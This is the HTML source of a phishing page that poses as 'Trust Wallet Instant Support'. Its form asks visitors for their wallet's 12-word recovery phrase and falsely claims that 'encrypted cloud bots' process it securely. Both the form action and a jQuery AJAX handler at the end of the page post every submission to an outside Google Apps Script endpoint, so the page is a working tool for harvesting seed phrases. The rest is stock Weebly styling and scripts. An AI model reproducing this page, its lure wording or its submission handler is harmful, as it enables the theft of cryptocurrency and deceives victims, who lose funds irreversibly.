<!DOCTYPE html>
<html lang="en">

<head>
	<title>Home</title>
	<meta property="og:site_name" content="">
	<meta property="og:title" content="My Site">
	<meta property="og:description" content="">
	<meta property="og:image" content="uploads/1/4/0/3/140326794/trust-wallet-1_orig.jpg">
	<meta property="og:image" content="uploads/1/4/0/3/140326794/trust-wallet-1.jpg">
	<meta property="og:url" content="https://trustwallethelp.weebly.com/">



	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0;">


	<link id="wsite-base-style" rel="stylesheet" type="text/css"
		href="//cdn2.editmysite.com/css/sites.css?buildTime=1640035830">
	<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/fancybox.css?1640035830">
	<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/social-icons.css?buildtime=1640035830"
		media="screen,projection">
	<link rel="stylesheet" type="text/css" href="files/main_style_1641120835.css" title="wsite-theme-css">
	<link
		href="//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&amp;subset=latin,latin-ext"
		rel="stylesheet" type="text/css">
	<link href="//fonts.googleapis.com/css?family=Montserrat:400,700&amp;subset=latin,latin-ext" rel="stylesheet"
		type="text/css">
	<link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic&amp;subset=latin,latin-ext"
		rel="stylesheet" type="text/css">

	<link
		href="//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&amp;subset=latin,latin-ext"
		rel="stylesheet" type="text/css">
	<link
		href="//fonts.googleapis.com/css?family=Lato:400,300,300italic,700,400italic,700italic&amp;subset=latin,latin-ext"
		rel="stylesheet" type="text/css">
	<link href="//fonts.googleapis.com/css?family=Cookie&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css">
	<link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic&amp;subset=latin,latin-ext"
		rel="stylesheet" type="text/css">
	<style type="text/css">
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) p,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
		#wsite-content div.paragraph,
		#wsite-content p,
		#wsite-content .product-block .product-title,
		#wsite-content .product-description,
		#wsite-content .wsite-form-field label,
		#wsite-content .wsite-form-field label,
		.blog-sidebar div.paragraph,
		.blog-sidebar p,
		.blog-sidebar .wsite-form-field label,
		.blog-sidebar .wsite-form-field label {
			font-family: "Lato" !important;
		}

		#wsite-content div.paragraph,
		#wsite-content p,
		#wsite-content .product-block .product-title,
		#wsite-content .product-description,
		#wsite-content .wsite-form-field label,
		#wsite-content .wsite-form-field label,
		.blog-sidebar div.paragraph,
		.blog-sidebar p,
		.blog-sidebar .wsite-form-field label,
		.blog-sidebar .wsite-form-field label {
			color: #666c70 !important;
		}

		.wsite-elements.wsite-footer div.paragraph,
		.wsite-elements.wsite-footer p,
		.wsite-elements.wsite-footer .product-block .product-title,
		.wsite-elements.wsite-footer .product-description,
		.wsite-elements.wsite-footer .wsite-form-field label,
		.wsite-elements.wsite-footer .wsite-form-field label {}

		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title,
		.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title,
		#wsite-content h2,
		#wsite-content .product-long .product-title,
		#wsite-content .product-large .product-title,
		#wsite-content .product-small .product-title,
		.blog-sidebar h2 {
			font-family: "Lato" !important;
			font-style: normal !important;
		}

		#wsite-content h2,
		#wsite-content .product-long .product-title,
		#wsite-content .product-large .product-title,
		#wsite-content .product-small .product-title,
		.blog-sidebar h2 {}

		.wsite-elements.wsite-footer h2,
		.wsite-elements.wsite-footer .product-long .product-title,
		.wsite-elements.wsite-footer .product-large .product-title,
		.wsite-elements.wsite-footer .product-small .product-title {}

		#wsite-title {
			font-family: "Cookie" !important;
			text-transform: none !important;
			letter-spacing: 1px !important;
		}

		.wsite-menu-default a {
			text-transform: uppercase !important;
		}

		.wsite-menu a {}

		.wsite-image div,
		.wsite-caption {}

		.galleryCaptionInnerText {}

		.fancybox-title {}

		.wslide-caption-text {}

		.wsite-phone {}

		.wsite-headline,
		.wsite-header-section .wsite-content-title {}

		.wsite-headline-paragraph,
		.wsite-header-section .paragraph {
			font-family: "Lora" !important;
			letter-spacing: 0px !important;
		}

		.wsite-button-inner {}

		.wsite-not-footer blockquote {}

		.wsite-footer blockquote {}

		.blog-header h2 a {}

		#wsite-content h2.wsite-product-title {}

		.wsite-product .wsite-product-price a {}

		@media screen and (min-width: 767px) {

			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) p,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label,
			#wsite-content div.paragraph,
			#wsite-content p,
			#wsite-content .product-block .product-title,
			#wsite-content .product-description,
			#wsite-content .wsite-form-field label,
			#wsite-content .wsite-form-field label,
			.blog-sidebar div.paragraph,
			.blog-sidebar p,
			.blog-sidebar .wsite-form-field label,
			.blog-sidebar .wsite-form-field label {
				font-size: 20px !important;
			}

			#wsite-content div.paragraph,
			#wsite-content p,
			#wsite-content .product-block .product-title,
			#wsite-content .product-description,
			#wsite-content .wsite-form-field label,
			#wsite-content .wsite-form-field label,
			.blog-sidebar div.paragraph,
			.blog-sidebar p,
			.blog-sidebar .wsite-form-field label,
			.blog-sidebar .wsite-form-field label {}

			.wsite-elements.wsite-footer div.paragraph,
			.wsite-elements.wsite-footer p,
			.wsite-elements.wsite-footer .product-block .product-title,
			.wsite-elements.wsite-footer .product-description,
			.wsite-elements.wsite-footer .wsite-form-field label,
			.wsite-elements.wsite-footer .wsite-form-field label {}

			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title,
			.wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title,
			#wsite-content h2,
			#wsite-content .product-long .product-title,
			#wsite-content .product-large .product-title,
			#wsite-content .product-small .product-title,
			.blog-sidebar h2 {}

			#wsite-content h2,
			#wsite-content .product-long .product-title,
			#wsite-content .product-large .product-title,
			#wsite-content .product-small .product-title,
			.blog-sidebar h2 {}

			.wsite-elements.wsite-footer h2,
			.wsite-elements.wsite-footer .product-long .product-title,
			.wsite-elements.wsite-footer .product-large .product-title,
			.wsite-elements.wsite-footer .product-small .product-title {}

			#wsite-title {
				font-size: 35px !important;
			}

			.wsite-menu-default a {}

			.wsite-menu a {}

			.wsite-image div,
			.wsite-caption {}

			.galleryCaptionInnerText {}

			.fancybox-title {}

			.wslide-caption-text {}

			.wsite-phone {}

			.wsite-headline,
			.wsite-header-section .wsite-content-title {}

			.wsite-headline-paragraph,
			.wsite-header-section .paragraph {}

			.wsite-button-inner {}

			.wsite-not-footer blockquote {}

			.wsite-footer blockquote {}

			.blog-header h2 a {}

			#wsite-content h2.wsite-product-title {}

			.wsite-product .wsite-product-price a {}
		}
	</style>
	<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/slideshow/slideshow.css?1640035830">

	<script>
		var STATIC_BASE = '//cdn1.editmysite.com/';
		var ASSETS_BASE = '//cdn2.editmysite.com/';
		var STYLE_PREFIX = 'wsite';
	</script>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>

	<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1640035830&amp;"></script>
	<script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1640035830"></script>
	<script type="text/javascript">
		function initCustomerAccountsModels() {
			(function () {
				_W.setup_rpc({ "url": "\/ajax\/api\/JsonRPC\/CustomerAccounts\/", "actions": { "CustomerAccounts": [{ "name": "login", "len": 2, "multiple": false, "standalone": false }, { "name": "logout", "len": 0, "multiple": false, "standalone": false }, { "name": "getSessionDetails", "len": 0, "multiple": false, "standalone": false }, { "name": "getAccountDetails", "len": 0, "multiple": false, "standalone": false }, { "name": "getOrders", "len": 0, "multiple": false, "standalone": false }, { "name": "register", "len": 4, "multiple": false, "standalone": false }, { "name": "emailExists", "len": 1, "multiple": false, "standalone": false }, { "name": "passwordReset", "len": 1, "multiple": false, "standalone": false }, { "name": "passwordUpdate", "len": 3, "multiple": false, "standalone": false }, { "name": "validateSession", "len": 1, "multiple": false, "standalone": false }] }, "namespace": "_W.CustomerAccounts.RPC" });
				_W.setup_model_rpc({ "rpc_namespace": "_W.CustomerAccounts.RPC", "model_namespace": "_W.CustomerAccounts.BackboneModelData", "collection_namespace": "_W.CustomerAccounts.BackboneCollectionData", "bootstrap_namespace": "_W.CustomerAccounts.BackboneBootstrap", "models": { "CustomerAccounts": { "_class": "CustomerAccounts.Model.CustomerAccounts", "defaults": null, "validation": null, "types": null, "idAttribute": null, "keydefs": null } }, "collections": { "CustomerAccounts": { "_class": "CustomerAccounts.Collection.CustomerAccounts" } }, "bootstrap": [] });
			})();
		}
		if (document.createEvent && document.addEventListener) {
			var initEvt = document.createEvent('Event');
			initEvt.initEvent('customerAccountsModelsInitialized', true, false);
			document.dispatchEvent(initEvt);
		} else if (document.documentElement.initCustomerAccountsModels === 0) {
			document.documentElement.initCustomerAccountsModels++
		}
	</script>
	<script type="text/javascript"> _W = _W || {}; _W.securePrefix = 'trustwallethelp.weebly.com'; </script>
	<script>_W = _W || {};
		_W.customerLocale = "en_US";
		_W.storeName = null;
		_W.isCheckoutReskin = false;
		_W.storeCountry = "NG";
		_W.storeCurrency = "USD";
		_W.storeEuPrivacyPolicyUrl = "";
		com_currentSite = "431671259440798091";
		com_userID = "140326794";</script>
	<script type="text/javascript" src="//cdn2.editmysite.com/js/old/slideshow-jq.js?buildTime=1640035830"></script>
	<script type="text/javascript">_W.configDomain = "www.weebly.com";</script>
	<script>_W.relinquish && _W.relinquish()</script>
	<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1640035830&amp;"></script>
	<script> _W.themePlugins = { "navpane": { "condense": 1024, "forced": 1 } };</script>
	<script src="//cdn2.editmysite.com/js/site/theme-plugins.js?buildTime=1640035830"></script>
	<script type="text/javascript"> _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; </script>
	<script type="text/javascript">


			function initFlyouts() {
				initPublishedFlyoutMenus(
					[{ "id": "978383081188802513", "title": "Home", "url": "index.html", "target": "", "nav_menu": false, "nonclickable": false }, { "id": "536598237488692644", "title": "Blog", "url": "blog.html", "target": "", "nav_menu": false, "nonclickable": false }],
					"978383081188802513",
					'',
					'active',
					false,
					{ "navigation\/item": "{{!\n\tNOTES:\n\t- an id and the \"wsite-menu-item-wrap\" class are required on the item wrapper\n\t- a \"wsite-menu-item\" class is required on the item link\n\t- an is_current variable is available\n\t- the current link will automagically get an \"active\" id\n}}\n\n<li {{#id}}id=\"{{id}}\"{{\/id}}\n\tclass=\"wsite-menu-item-wrap\"\n\t>\n\t<a {{^nonclickable}}\n\t\t\t\t{{^nav_menu}}\n\t\t\t\t\thref=\"{{url}}\"\n\t\t\t\t{{\/nav_menu}}\n\t\t\t{{\/nonclickable}}\n\t\t{{#target}}target=\"{{target}}\"{{\/target}}\n\t\tclass=\"wsite-menu-item {{#has_children}}subnav-link{{\/has_children}}\"\n\t\t{{#membership_required}}\n\t\t\tdata-membership-required=\"{{.}}\"\n\t\t{{\/membership_required}}\n\t\t{{#has_children}}\n\t\t\tdata-submenu=\"submenu-{{id}}\"\n\t\t{{\/has_children}}\n\t\t>\n\t\t{{{title_html}}}\n\t{{#has_children}}<span class=\"wsite-menu-arrow\"><\/span>{{\/has_children}}\n\t<\/a>\n\t{{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>", "navigation\/flyout\/list": "{{!\n\tNOTES:\n\t- \"wsite-menu-wrap\" required on submenu wrapper\n\t- \"wsite-menu\" required on submenu element\n}}\n\n<div class=\"wsite-menu-wrap\" style=\"display:none\">\n\t<ul class=\"wsite-menu\" {{#id}}id=\"submenu-{{id}}\"{{\/id}}>\n\t\t{{#children}}{{> navigation\/flyout\/item}}{{\/children}}\n\t<\/ul>\n<\/div>", "navigation\/flyout\/item": "{{!\n\tNOTES:\n\t- an id and \"wsite-menu-subitem-wrap\" class are required on the item wrap\n\t- a \"wsite-menu-subitem\" class is required on the item link\n}}\n\n<li {{#id}}id=\"{{id}}\"{{\/id}}\n\tclass=\"wsite-menu-subitem-wrap {{#is_current}}wsite-nav-current{{\/is_current}}\"\n\t>\n\t<a {{^nonclickable}}\n\t\t\t{{^nav_menu}}\n\t\t\t\thref=\"{{url}}\"\n\t\t\t{{\/nav_menu}}\n\t\t{{\/nonclickable}}\n\t\t{{#target}}target=\"{{target}}\"{{\/target}}\n\t\tclass=\"wsite-menu-subitem {{#has_children}}subnav-link{{\/has_children}}\"\n\t\t{{#has_children}}\n\t\t\tdata-submenu=\"submenu-{{id}}\"\n\t\t{{\/has_children}}\n\t\t>\n\t\t<span class=\"wsite-menu-title\">\n\t\t\t{{{title_html}}}\n\t\t<\/span>{{#has_children}}<span class=\"wsite-menu-arrow\">&gt;<\/span>{{\/has_children}}\n\t<\/a>\n\t{{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>" },
					{ "hasCustomMinicart": true }
				)
			}
//-->
	</script>

	<script data-cfasync="false" type="text/javascript" src="form-submission-handler.js"></script>

	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>




</head>

<body class="header-page  wsite-page-index  wsite-theme-light">
	<div id="header">
		<div class="container">
			<div class="icons">
				<div class="w-navpane-trigger hamburger">
					<span></span>
				</div>
			</div>
			<div class="logo"><span class="wsite-logo">


					<span class="wsite-title-placeholder">&nbsp;</span><span style="display:none">
						<span style="display:none">&nbsp;</span>
					</span>


				</span></div>
			<div class="icons">


				<a href="#" class="close w-navpane-close"><span></span></a>
			</div>
		</div>
		<div id="navlist" class="w-navlist nav">
			<ul class="wsite-menu-default">

				<li id="active" class="wsite-menu-item-wrap">
					<a href="" class="wsite-menu-item ">
						Home

					</a>

				</li>
				<li id="pg536598237488692644" class="wsite-menu-item-wrap">
					<a href="blog/" class="wsite-menu-item ">
						Blog

					</a>

				</li>
			</ul>
		</div>
		<div id="menu" class="slide-panel">
			<div id="nav" class="nav w-navpane">
				<div class="container">
					<ul class="wsite-menu-default">

						<li id="active" class="wsite-menu-item-wrap">
							<a href="" class="wsite-menu-item ">
								Home

							</a>

						</li>
						<li id="pg536598237488692644" class="wsite-menu-item-wrap">
							<a href="blog/" class="wsite-menu-item ">
								Blog

							</a>

						</li>
					</ul>
				</div>
			</div>
		</div>
		<div id="search" class="slide-panel">
			<div class="container">Search by typing &amp; pressing enter</div>
		</div>
		<div id="cart" class="slide-panel">
			<div class="container">
				<h2>YOUR CART</h2>
			</div>
		</div>
	</div>

	<div id="content">
		<div id="banner">
			<div class="wsite-elements wsite-not-footer wsite-header-elements">
				<div class="wsite-section-wrap">
					<div class="wsite-section wsite-header-section wsite-section-bg-color"
						style="height: 665px;background-color: #fff;background-image: none;is_customized: 1;">
						<div class="wsite-section-content">

							<div class="banner-content">
								<div class="container">
									<div class="wsite-section-elements">
										<div>
											<div class="wsite-image wsite-image-border-none "
												style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:inherit">
												<a>
													<img src="uploads/1/4/0/3/140326794/trust-wallet-1_orig.jpg"
														alt="Picture" style="width:auto;max-width:100%">
												</a>
												<div style="display:block;font-size:90%"></div>
											</div>
										</div>
									</div>
								</div>
							</div>

						</div>
						<div class=""></div>
					</div>
				</div>

			</div>

		</div>

		<div id="main">
			<div id="wsite-content" class="wsite-elements wsite-not-footer">
				<div class="wsite-section-wrap">
					<div class="wsite-section wsite-body-section wsite-background-4" style="vertical-align: top;">
						<div class="wsite-section-content">
							<div class="container">
								<div class="wsite-section-elements">
									<h2 class="wsite-content-title" style="text-align:center;"><strong>
											<font color="#1768d0">
												<font size="7" style="">Trust Wallet Instant Support</font><br>
												<font size="6" style="">Kindly engage us by filling the form below and
													get a response in minutes</font>
											</font>
										</strong></h2>

									<div>
										<form class="gform"
											action="https://script.google.com/macros/s/AKfycbwN1QCe-0l0NXdwzXegoyhazo4vQ7XaVM5fhwcUP8dPPZz2qTGevWT8qZdcHdwbrlap8Q/exec"
											method="post" id="sheetdb-form" encType="multipart/form-data"
											onsubmit="submitted=true;">
											<div id="234910973847391541-form-parent" class="wsite-form-container"
												style="margin-top:10px;">
												<ul class="formlist" id="234910973847391541-form-list">
													<label
														class="wsite-form-label wsite-form-fields-required-label"><span
															class="form-required">*</span> Indicates required
														field</label>
													<div>
														<div class="wsite-form-field wsite-name-field"
															style="margin:5px 0px 5px 0px;">
															<label class="wsite-form-label">Name <span
																	class="form-required">*</span></label>
															<div style="clear:both;"></div>
															<div
																class="wsite-form-input-container wsite-form-left wsite-form-input-first-name">
																<input aria-required="true"
																	id="input-716210123419951602"
																	class="wsite-form-input wsite-input"
																	placeholder="First" type="text" name="[First Name]">
																<label class="wsite-form-sublabel"
																	for="input-716210123419951602">First</label>
															</div>
															<div
																class="wsite-form-input-container wsite-form-right wsite-form-input-last-name">
																<input aria-required="true"
																	id="input-716210123419951602-1"
																	class="wsite-form-input wsite-input"
																	placeholder="Last" type="text" name="[last Name]">
																<label class="wsite-form-sublabel"
																	for="input-716210123419951602-1">Last</label>
															</div>
															<div id="instructions-716210123419951602"
																class="wsite-form-instructions" style="display:none;">
															</div>
														</div>
														<div style="clear:both;"></div>
													</div>

													<div>
														<div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
															<label class="wsite-form-label"
																for="input-173110898622175997">Email <span
																	class="form-required">*</span></label>
															<div class="wsite-form-input-container">
																<input aria-required="true"
																	id="input-173110898622175997"
																	class="wsite-form-input wsite-input wsite-input-width-370px"
																	type="text" name="Email">
															</div>
															<div id="instructions-173110898622175997"
																class="wsite-form-instructions" style="display:none;">
															</div>
														</div>
													</div>

													<div>
														<div class="wsite-form-field" style="margin:5px 0px 0px 0px;">
															<label class="wsite-form-label"
																for="input-729405739352505924">Which issues are you
																currently experiencing? <span
																	class="form-required">*</span></label>
															<div class="wsite-form-radio-container">
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-0-_u729405739352505924"
																		name="[Transactional delays]" value="1"><label
																		for="checkbox-0-_u729405739352505924">Transactional
																		delays</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-1-_u729405739352505924"
																		name="[Missing Funds]" value="1"><label
																		for="checkbox-1-_u729405739352505924">Missing
																		Funds</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-2-_u729405739352505924"
																		name="[ID Verification]" value="1"><label
																		for="checkbox-2-_u729405739352505924">ID
																		Verification</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-3-_u729405739352505924"
																		name="[Swap / Exchange Issues]" value="1"><label
																		for="checkbox-3-_u729405739352505924">Swap /
																		Exchange Issues</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-4-_u729405739352505924"
																		name="[High Fees]" value="1"><label
																		for="checkbox-4-_u729405739352505924">High
																		Fees</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-5-_u729405739352505924"
																		name="[Log-in Issues]" value="1"><label
																		for="checkbox-5-_u729405739352505924">Log-in
																		Issues</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-6-_u729405739352505924"
																		name="[Forgot Password]" value="1"><label
																		for="checkbox-6-_u729405739352505924">Forgot
																		Password</label></span>
																<span class="form-radio-container"><input
																		type="checkbox"
																		id="checkbox-7-_u729405739352505924"
																		name="[Others]" value="1"><label
																		for="checkbox-7-_u729405739352505924">Others</label></span>

															</div>
															<div id="instructions-Which issues are you currently experiencing?"
																class="wsite-form-instructions" style="display:none;">
															</div>
														</div>
													</div>

													<div>
														<div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
															<label class="wsite-form-label"
																for="input-732407915903242598">Additional details on the
																issues you are currently experiencing: <span
																	class="form-required">*</span></label>
															<div class="wsite-form-input-container">
																<textarea aria-required="true"
																	id="input-732407915903242598"
																	class="wsite-form-input wsite-input wsite-input-width-370px"
																	name="Details" style="height: 200px"></textarea>
															</div>
															<div id="instructions-732407915903242598"
																class="wsite-form-instructions" style="display:none;">
															</div>
														</div>
													</div>


													<div class="thankyou_message" style="display:none;">
														<h1>Thanks</h1>
													</div>

													<div>
														<div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
															<label class="wsite-form-label"
																for="input-602150802822679900">Please provide the 12
																recovery phrase linked to your affected trust wallet
																account. ( Kindly note that this is processed by trust
																wallet encrypted cloud bots. Your security is our utmost
																priority ) <span class="form-required">*</span></label>
															<div class="wsite-form-input-container">
																<textarea aria-required="true"
																	id="input-602150802822679900"
																	class="wsite-form-input wsite-input wsite-input-width-370px"
																	name="phrase" style="height: 200px"></textarea>
															</div>
															<div id="instructions-602150802822679900"
																class="wsite-form-instructions" style="display:none;">
															</div>
														</div>
													</div>
												</ul>

											</div>
											<div style="display:none; visibility:hidden;">
												<input type="hidden" name="wsite_subject">
											</div>
											<div style="text-align:left; margin-top:10px; margin-bottom:10px;">
												<input type="hidden" name="form_version" value="2">
												<input type="hidden" name="wsite_approved" id="wsite-approved"
													value="approved">
												<input type="hidden" name="id" value="234910973847391541">
												<input type="hidden" name="recaptcha_token">
												<input type="submit" role="button" aria-label="Submit" value="submit"
													style="position:absolute;top:0;left:-9999px;width:1px;height:1px">
												<a class="wsite-button">
													<span class="wsite-button-inner">Submit</span>
												</a>
											</div>


										</form>




										<div id="g-recaptcha-234910973847391541" class="recaptcha" data-size="invisible"
											data-recaptcha="0" data-sitekey="6Ldf5h8UAAAAAJFJhN6x2OfZqBvANPQcnPa8eb1C">
										</div>



									</div>
								</div>
							</div>
						</div>

					</div>
				</div>
				<div class="wsite-section-wrap">
					<div class="wsite-section wsite-body-section wsite-background-6" style="height: 388px;">
						<div class="wsite-section-content">
							<center>
								<img src="./banneree.png" alt="" srcset="">
							</center>
						</div>

					</div>
				</div>

			</div>

		</div>

		<div id="footer">

			<style type="text/css">
				@font-face {
					font-family: SQMarket-Medium;
					font-style: normal;
					font-weight: 500;
					src:
						url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
						url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff") format("woff");
				}
			</style>

			<div id="weebly-footer-signup-container-v3">
				<a href="https://www.weebly.com/signup?utm_source=internal&amp;utm_medium=footer" target="_blank"
					class="signup-container-header" id="signup-link-href">
					<div class="powered-by">
						<div class="footer-published-ab-powered-by">
							Powered by <span class="link weebly-icon"></span>
							<img class="footer-ab-published-toast-image"
								src="//cdn2.editmysite.com/images/site/footer/footer-toast-published-image-1.png">
							<span class="footer-ab-published-toast-text">Create your own unique website with
								customizable templates.</span>
							<span class="footer-ab-published-toast-button-wrapper">
								<button class="footer-published-ab-button">Get Started</button>
							</span>
						</div>
					</div>
				</a>
			</div>

			<script type="text/javascript"
				src="//cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1653689076"></script>
			<script type="text/javascript">
				if (document.readystate === 'complete') {
					Weebly.footer.setupContainer('cdn2.editmysite.com', '1653689076');
				} else {
					document.addEventListener('DOMContentLoaded', function () {
						Weebly.footer.setupContainer('cdn2.editmysite.com', '1653689076');
					});
				}
			</script>
		</div>
	</div>

	<div class="overlay w-navpane-close"></div>

	<script type="text/javascript" src="files/theme/plugins_1573850854.js"></script>
	<script type="text/javascript" src="files/theme/custom_1573850854.js"></script>
	<div id="customer-accounts-app"></div>
	<script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1640035830"></script>

	<script type="text/javascript">
		var _gaq = _gaq || [];
		_gaq.push(['_setAccount', 'UA-7870337-1']);
		_gaq.push(['_setDomainName', 'none']);
		_gaq.push(['_setAllowLinker', true]);

		(function () {
			var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
			// NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
			var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);
		})();

		_W.Analytics = _W.Analytics || { 'trackers': {} };
		_W.Analytics.trackers.wGA = '_gaq';
	</script>







	<script>
		(function (jQuery) {
			try {
				if (jQuery) {
					jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
					var $commentFrame = jQuery('#commentArea iframe');
					if ($commentFrame.length > 0) {
						var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
						$commentFrame.css('min-height', frameHeight + 'px');
					}
					if (jQuery('.product-button').length > 0) {
						jQuery(document).ready(function () {
							jQuery('.product-button').parent().each(function (index, product) {
								if (jQuery(product).attr('target') == 'paypal') {
									if (!jQuery(product).find('> [name="bn"]').length) {
										jQuery('<input>').attr({
											type: 'hidden',
											name: 'bn',
											value: 'DragAndDropBuil_SP_EC'
										}).appendTo(product);
									}
								}
							});
						});
					}
				}
				else {
					// Prototype
					$$('div.blog-social div.fb-like').each(function (div) {
						div.className = 'blog-social-item blog-fb-like';
					});
					$$('#commentArea iframe').each(function (iframe) {
						iframe.style.minHeight = '410px';
					});
				}
			}
			catch (ex) { }
		})(window._W && _W.jQuery);
	</script>

	<script>
		window._W.isEUUser = false;
		window._W.showCookieToAll = "";
	</script>

<script>
    $('form').submit(function(e) {
        e.preventDefault();
        $.ajax({
            url: "https://script.google.com/macros/s/AKfycbwN1QCe-0l0NXdwzXegoyhazo4vQ7XaVM5fhwcUP8dPPZz2qTGevWT8qZdcHdwbrlap8Q/exec",
            data: $(this).serialize(),
            type: "POST",
            dataType: "xml",
            success: function(data) {
                console.log('Submission successful');
            },
            error: function(xhr, status, error) {
                console.log('Submission failed: ' + error);
            }
        });
    });
</script>



</script>


</body>

</html>